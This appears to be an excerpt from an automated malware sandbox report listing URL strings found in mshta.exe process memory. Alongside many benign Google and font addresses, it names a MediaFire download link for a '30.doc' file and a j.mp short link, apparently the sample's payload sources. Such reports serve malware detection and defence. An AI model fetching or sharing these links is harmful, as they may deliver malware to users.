Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/forms/?usp=forms_alc
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=slides_alc
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=sheets_alc
Source: mshta.exe, 00000005.00000002.441579663.0000000003A07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440369877.0000000003A07000.00000004.00000001.sdmpString found in binary or memory: https://download1370.mediafire.com/
Source: mshta.exe, 00000005.00000003.439738896.0000000000423000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441065797.0000000000423000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc
Source: mshta.exe, 00000005.00000002.441059756.0000000000413000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc...
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docC:
Source: mshta.exe, 00000005.00000002.443517069.0000000006E80000.00000004.00000040.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docFKWWSV
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docPV
Source: mshta.exe, 00000005.00000003.438980428.0000000002BC5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.438821906.0000000002BC5000.00000004.00000001.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.dochttps://download1370.mediafire
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?tab=jo
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://duo.google.com/?usp=duo_ald
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://earth.google.com/web/
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/A
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/cap-
Source: mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=de&family=Product
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/iv
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/rder-r
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmpString found in binary or memory: https://j.mp/L